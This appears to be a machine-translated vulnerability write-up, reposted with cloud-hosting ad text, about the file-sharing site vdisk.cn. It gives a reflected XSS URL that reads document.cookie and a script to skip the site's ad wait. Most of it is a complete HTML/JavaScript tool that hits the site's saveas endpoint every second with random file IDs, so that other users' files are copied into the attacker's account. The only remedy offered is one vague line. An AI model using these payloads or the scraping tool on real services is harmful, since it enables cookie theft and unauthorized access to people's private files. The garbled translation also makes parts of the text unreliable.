Weipan allows users to upload files without registration (the system automatically creates users), without capacity restrictions, and is easy to download and used by many people.
1. XSS: WAF has a search function and has found a typical form xss.
Http://www.vdisk.cn/tempuser1334906450? S = % 22 + onmouseover % 3 Djavascript % 3 Aalert % 28document. cookie % 29% 3E
2. Download from any favorites:
Every file in the weave is numbered as follows: http://www.vdisk.cn/down/index/10016545. Click here and wait for 10 seconds for the advertisement (if you don't want to wait, clear the address bar and enter javascript: document. getElementById ('loadingbox '). style. display = 'none'; document. getElementById ('btnbox '). style. display = 'block';) will appear, there is a storage as my network disk, and then save it. If you do not have a Wei disk account, you can easily upload a file at will, wei Pan automatically assigns you an account, such as tempuser1334905592, which I see in the following code
Var loadcount = 1;
Function saveas (id ){
If (jQuery. cookie ('uid') = null ){
Alert ('you have not logged on yet, please click Login in the upper right corner or register for free .');
}
Else {
$. AjaxSetup ({async: true, cache: false, type: "GET "});
$. GetJSON ('/json/saveas? Id = '+ id ,'',
Function (json ){
If (json. result! = True) {alert (json. msg );}
Else {if (confirm ("the file has been copied and saved successfully. Are you sure you want to go to your disk now? ") Location = '/user/admin/' + jQuery. cookie ('userid ');}
});
}
}
$ (). Ready (function (){
SetTimeout ("document. getElementById ('loadingbox '). style. display = 'none'; document. getElementById ('btnbox '). style. display = 'block'; ", 10000 );
});
Save as is a saveas (id) function. Now you open this http://www.vdisk.cn/json/saveas address? Id = 'id' (the core of the saveas function). It asynchronously adds this id to your account in the background. This is also the premise of any favorites. if you write a tool and open the link at intervals, the following id is a combination of 7-8 digits. The minimum value is 3440540 and the maximum value is 10018135, in this way, your temporary account will be owned by weipan soon (?) File Information.
Code:
<Html>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> AVG disk favorites </title>
<Style type = "text/css">
<! --
Body, td, th {
Font-size: 24px;
Color: # FF6;
}
Body {
Background-color: #366;
Margin-left: 20px;
Margin-top: 20px;
Margin-right: 20px;
Margin-bottom: 20px;
}
A {color: # FFF}
-->
</Style> <Body>
<Script>
Var s = '';
Function shua (){
SetTimeout ("shua ()", 1000 );
S = "http://www.vdisk.cn/json/saveas? Id = "+ eval (Math. round (Math. random () * 6577595) + 3440540 );
Document. getElementById ("my"). src = s;
Document. getElementById ("t"). innerHTML = "<a href =" + s + ">" + s + "</a> <br/>"
}
Shua ();
</Script>
<P>
Favorites: <span id = "t"> </span>
</P>
<Iframe id = "my" width = "80%"> </iframe>
</Body>
</Html>
Www.2cto.com
Use any favorites to test the effect:
Http://www.vdisk.cn/tempuser1334839579
Solution:
Set permissions. Otherwise, the server will be cracked.
Author 4th
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
